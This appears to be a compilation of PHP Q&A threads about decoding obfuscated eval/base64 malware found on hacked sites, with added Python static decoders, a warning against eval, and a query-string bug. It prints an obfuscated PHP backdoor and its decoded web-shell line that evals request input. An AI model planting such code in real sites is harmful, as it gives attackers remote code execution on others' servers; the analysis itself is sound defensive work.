How to evaluate this string - php

I'm maintaining a PHP site that is very old and very funky.
Last night the site got hacked. I found this one file that I'm not sure if it's from the hackers or from the aforementioned funkiness. Does anyone know how I can decode this:
<?php
eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B");
?>
thanks,
Jack

Replace eval with echo. Repeat.
http://pastebin.com/3X2FcvW3


Eval PHP Hack Cannot decode code

I have read a lot on the normal PHP eval with the base64 encoder and was able to decode many of the infected PHP files.
With that said, I have this one file that does not follow the standard eval call and I would like some help from the community.
Can anyone decode and/or tell me what's happening in the code?
Thanks,
--Eric
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnBvKi9ldmFsLypGUSZRX00qLygvKk56SiovYmFzZTY0X2RlY29kZS8qPDU+cyovKC8qTVl5YnMqLydMeW91U
EZJcUwybG1MeXBiY0h0aFZTb3ZLQzhxZCcvKndLc2Q/PGgqLy4vKllcdkgqLycweHVYRFJvTkNvdmFYTnpaWFF2S2sxTVBDb3ZLQycvKiF9Z1sqLy4vKiBrVlQqLyc4cWRYMHJLaThrWDFKRlVWVkZVMVF2S2
54Mk9DdCcvKjlRSG1Ta1FIKi8uLypFYlMuaCovJ2VNRHM4S2k5Ykx5cHNkSFlxTHlkakp5OHFkMmRHJy8qQUI5Ki8uLypxcyFIZU4qLydlQ292TGk4cVFsVXpObElxTHlkdUp5OHFjRGw0SScvKiY6ZSovLi8
qSlVxKi8nVU51S2k4dUx5b3hYQ1o2S2k4bmVTY3ZLbU10Sz'/*0B>.'&CK*/./*W1H*/'MnLypxcFpJKi8uLypBKWVTKi8nQlNLaTh1THlwa2JqRTFKVG9xTHlkemNTY3ZLa2QnLypgZj5zZTgqLy4vKjlENT
FcTyovJ0ROVGxWS2k5ZEx5cFRORXc1S2k4dkttaytXVE1vJy8qOmBaRUtlJkUqLy4vKlVILjspZSovJ1pTb3ZLUzhxT1RCbFVsWlZLaTh2S2xaSmRTVkpmJy8qVzpMa2hUKi8uLyo1cTNmdT8qLydDb3ZLUzh
xTlZvM0ppb3ZaWFpoYkM4cVp5MWNTMCcvKmheXTtbICovLi8qTC5SS2JZKi8nY3FMeWd2S21KNFZVNHllU292YzNSeWFYQnpiR0YnLypTS2MuJSovLi8qb3MwXjUySHsqLyd6YUdWekx5cGVWVjUzYnlvdktD
OHFKMk00SjBvcScvKlJrSCEqLy4vKk41JjkqLydMeVJmVWtW'/*Ju%:AN*/./*0\`a Z=*/'UlZVVlRWQzhxUUNoZGF5b3ZXeThxTCcvKjw8J3guaCovLi8qbixXKi8nV1JXZXpKSFB6QXFMeWRqYmljdktpMX
JlVkpKS2knLyotVS5zKi8uLyogUl5OKi8nOHVMeXBFVnpKYVoyRXFMeWQ1YzNFbkx5bzRTMFknLypjWmsqLy4vKjNkeWVMKi8naElEb3lRU292WFM4cU5peDZkU292THlwdlNVSngnLyonQVJWdyl1Ki8uLyp
eX1pKOmZ2Ki8nVVNvdktTOHFNV0JqS1V3cUx5OHFiMVU4T2tzcUwnLypUdlQrJkYqLy4vKmtFPDNmISovJ3lrdktsVkllMnNsS2k4dktsWmhVaTVUS3lvdk95OHFKbHhoZlN4MEtpOD0nLypaKWVePyovKS8q
J2tYKi8vKmsmViovKS8qMWdFVyovLyo8OHhObSovOy8qXW8/Ki8='/*L,}I*/)/*8Oyj*//*uEGgU*/)/*+LT*//*Q?.e*/;/*oGCkBv*/ ?>
If you go all the way down the rabbit hole, you get the following command.
if(isset($_REQUEST['cnysq']))eval(stripslashes($_REQUEST['cnysq']));
If you open the code up in a visual editor, you'll see there are a lot of comments. Remove those, and you'll see that it's a base64-encoded string.
Decode that, and you'll see more of the same.
Keep removing comments and concatenating strings and after about 3 levels, you get to this point.
It's just a bunch of PHP comments in there, e.g. from the first line:
<?php /*vg!*/eval/*E}--oP8*/(/*pxHO*/base64_decode/*vgKGm*/(/*0%C*/'LypPSnB etc...
      ^^^^^^^    ^^^^^^^^^^^ ^^^^^^^^             ^^^^^^^^^ ^^^^^^^--comments
is really just
<?php eval(base64_decode('LypPSnB etc...
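The manual procedure in the answers above (remove comments, concatenate the string pieces, base64-decode, repeat) can be done statically so that nothing is ever executed. This is an added example, not code from the original posts; the function names and the harmless three-layer SAMPLE are constructed for illustration.

```python
import base64
import re

COMMENT = re.compile(r"/\*.*?\*/", re.S)        # PHP block comment
CONCAT = re.compile(r"'\s*\.\s*'")               # 'abc'.'def' join point
LAYER = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]*)'\s*\)\s*\)")


def strip_noise(src: str) -> str:
    """Drop /*...*/ comments, then merge adjacent single-quoted literals.

    Comments go first because they may contain quotes; base64 text has
    no '*', so a literal can never be mistaken for a comment opener.
    """
    return CONCAT.sub("", COMMENT.sub("", src))


def peel(src: str, max_layers: int = 20):
    """Return (layers_removed, innermost_source). Nothing is executed."""
    src, layers = strip_noise(src), 0
    while layers < max_layers:
        m = LAYER.search(src)
        if m is None:
            break
        src = strip_noise(base64.b64decode(m.group(1)).decode("latin-1"))
        layers += 1
    return layers, src


def wrap(php: str) -> str:
    """Build one constructed layer: comments between tokens, split literal."""
    b64 = base64.b64encode(php.encode()).decode()
    a, b = b64[: len(b64) // 2], b64[len(b64) // 2:]
    return (f"/*a1*/eval/*b'2*/(/*c3*/base64_decode/*d4*/(/*e5*/'{a}'"
            f"/*f.6*/./*g7*/'{b}'/*h8*/)/*i9*/)/*j*/;")


# Constructed, harmless three-layer sample in the style of the file above.
SAMPLE = "<?php " + wrap(wrap(wrap("echo 'constructed harmless payload';"))) + " ?>"

if __name__ == "__main__":
    print(peel(SAMPLE))
```

Run it on a copy of the suspicious file read as text; the innermost source it returns is what the chain of eval calls would have executed.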

Pulling and outputting PHP tags from a database

I am trying to create a dynamic FAQ page. I have the following phtml sample :
<div id="faq">
<!-- Start FAQ "Navigation" -->
<div class="faqBox">
<? foreach($this->aFAQ as $k => $val) : ?>
<?= ($val['mQuestion']); ?>
<?= ($val['mAnswer']); ?>
<? endforeach; ?>
</div>
</div>
Which outputs as follows:
For additional payment options - check or money order, please contact us at iBrandingLevel == 2 ? $this->oStore->getSuppPhone()." Monday to Friday ".$this->oStore->getSuppHoursOpen()." - ".$this->oStore->getSuppHoursClose()." ".$this->oStore->getSuppTimeZone() : "(888) 455-3237 x2 from Monday to Friday 8:00am - 4:30pm MST/Arizona."; ?>
The above text is just the first $val['mAnswer'] (I didn't include the question as that is working properly).
The HTML is being rendered, however obviously the PHP isn't. The <? and ?> are being removed and just code is displaying. Is there a fix for this, or is my approach fundamentally wrong?
thanks
Your approach is fundamentally wrong: you are outputting PHP code as if it was HTML text and trying to execute it.
It is possible to execute code from a string, you can look at the Eval method (http://php.net/manual/fr/function.eval.php) in PHP, but it is not recommended to do this. There are better ways to resolve your specific issues than to output PHP code directly.
What you could do is send a few variables to the view, and use if conditions there.
You could also prepare the full string you need before the view and then all that would be needed is to display it.
To elaborate a little about Eval :
1- If the code you execute within the Eval comes from a user, it is extremely dangerous.
2- If not, there is very often a better solution to the problem, using Eval makes it harder to debug.
Actually, I'm not sure I should answer this.
First, the answer to your request is the mixed eval ( string $code ) php function.
Second, FORGET IT. IMHO, this could be one of the most dangerous things you could think of.
Thanks everybody for the input and resulting discourse. The php code that was being stored in the database was not being input by users, it was all completely internal, however it still shouldn't be there.
I ultimately went through the database and set a %%variablename%% in place of the php code and then upon retrieval I wrote a script that would:
preg_replace("/\%\%variablename\%\%/", $desiredPhpcode, $dbRetrievedString)
all instances of %%variablename%%.
It seemed the safer and more sound approach. I don't know if this is an IDEAL approach that anybody else could benefit from if caught in this circumstance or if it 'just works', but I thought I would share.
Thanks again for the input, it helped enormously.
PHP is a server-side language. Outputting it to the client does not make any sense, as there is no one to interpret it.

Decode an Encrypted PHP File Assistance

I have a file that I'm trying to decode but I'm not sure the best way to go about doing it. I've tried putting it through a few online tools but haven't had much luck...the code looks like this:
<?php
$zAkSoSavjFOn='jumbledcodeinhere';
$THkNltHSOjsXfQLzr=';))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir';
$DzbOntpeGhMcan=strrev($THkNltHSOjsXfQLzr);
$WnJYuMUwKmRxBh=str_rot13($DzbOntpeGhMcan);
eval($WnJYuMUwKmRxBh);
?>
In all my playing I managed to extract the following with a php script:
eval(gzinflate(base64_decode(strrev($zAkSoSavjFOn))));
Could someone point me in the right direction on going about this process? Any help would be appreciated. :)
The "jumbled code" is gzipped, base64-encoded, reversed PHP code that is almost certainly malicious.
Replace eval with echo and see what it gives you, that's what the code that is trying to run is.
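The same unwrapping can be done outside PHP, so the payload is only ever handled as data. This is an added example, not code from the original posts: STUB is the scrambled string from the question, while the function names and the blob produced by make_blob (a harmless stand-in for the elided 'jumbledcodeinhere' value) are constructed for illustration.

```python
import base64
import codecs
import re
import zlib

# Python equivalents of the PHP functions in the revealed chain,
# plus str_rot13 and the other two gz* decoders.
TRANSFORMS = {
    "strrev": lambda b: b[::-1],
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE, no header
    "gzuncompress": zlib.decompress,                  # zlib header + Adler-32
    "gzdecode": lambda b: zlib.decompress(b, 31),     # gzip header + CRC-32
}

# The scrambled decoder string exactly as posted in the question.
STUB = ";))))aBSwinFbFxNm$(ireegf(rqbprq_46rfno(rgnysavmt(ynir"


def reveal_decoder(scrambled: str) -> str:
    """Undo str_rot13(strrev(...)) on the stub string."""
    return codecs.decode(scrambled[::-1], "rot13")


def parse_chain(decoder: str):
    """'eval(f(g($v)));' -> (['f', 'g'], 'v'); eval is dropped, never run."""
    names = re.findall(r"(\w+)\s*\(", decoder)
    var = re.search(r"\$(\w+)", decoder).group(1)
    return [n for n in names if n != "eval"], var


def decode_blob(decoder: str, blob: str) -> str:
    """Apply the chain innermost-first; KeyError means an unmapped function."""
    data = blob.encode("latin-1")
    for name in reversed(parse_chain(decoder)[0]):
        data = TRANSFORMS[name](data)
    return data.decode("latin-1")


def make_blob(php: str) -> str:
    """Constructed stand-in for the elided 'jumbledcodeinhere' value."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php.encode()) + c.flush()).decode()[::-1]


if __name__ == "__main__":
    dec = reveal_decoder(STUB)
    print(dec)
    print(decode_blob(dec, make_blob("echo 'constructed harmless payload';")))
```

Note that gzinflate expects raw DEFLATE data, which is why the Python call passes a window size of -15; a plain zlib.decompress on such a blob fails with a header error.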

PHP: How to decode eval()?

I just noticed today that I have got lots of spam links in my WordPress blog. I just found a file which contains
<?php eval (chr(101).chr(114)...
It's a very, very long string. Can someone tell me how I can decode this to see what it does, so that I can try to remove the spam links?
Thanks.
Just replace eval by echo and have a look at the generated output
<?php echo (chr(101).chr(114)...
Instead of executing (eval) you can just echo out what it says, preferably with htmlspecialchars if you execute it via browser:
<?php echo htmlspecialchars(chr(101)...
Odds are, though, that you won't see anything understandable, since it is probably encoded in more ways than one.
Simply replace eval with echo:
<?php echo (chr(101).chr(114)...
Besides that, you most likely need to reinstall whatever you have on your webspace as you obviously have been hacked. Ensure that you use the most recent version of Wordpress and all other software you are running to prevent this from happening again.

Sending information through URL using $_GET not working

So I'm trying to do something extremely simple, and after reading through forums and researching on Google I still can't figure out why this is not working. But this is most likely because I'm still very much a newbie programmer. I'm trying to send information through a URL, and having a script pick it up using the $_GET superglobal.
Here's the link code, in a file called TESTFORM.php:
<p>
Here's a link:
ID
</p>
This is the TESTGET.php script:
<?php
if (isset($_GET['id']))
echo 'it is set<br />';
else
echo 'it is not set<br />';
?>
This results in "It is not set" appearing on the page every time. Any thoughts? Are there ghosts in my computer ruining my code? Thanks for taking the time to read through this! Happy coding!
I'm no PHP programmer, but I do know from HTML that computers (especially file names) don't "like" spaces. Try removing the spaces in the id = 5 code.
Your problem is the extraneous space here around the URL parameters:
ID
That will result in PHP seeing the parameter as $_GET["id_"]. The space gets converted into an underscore.
It's always best to use var_dump($_GET); or var_dump($_REQUEST) when you run into such problems. Secondarily it is sometimes helpful to get rid of isset in such cases. Albeit you have a custom error message in place of the language notices intended just for that.
Have you tried to remove spaces in your link?
ID
Code seems fine at a glance, have you tried removing the spaces in
?id = 5 to ?id=5
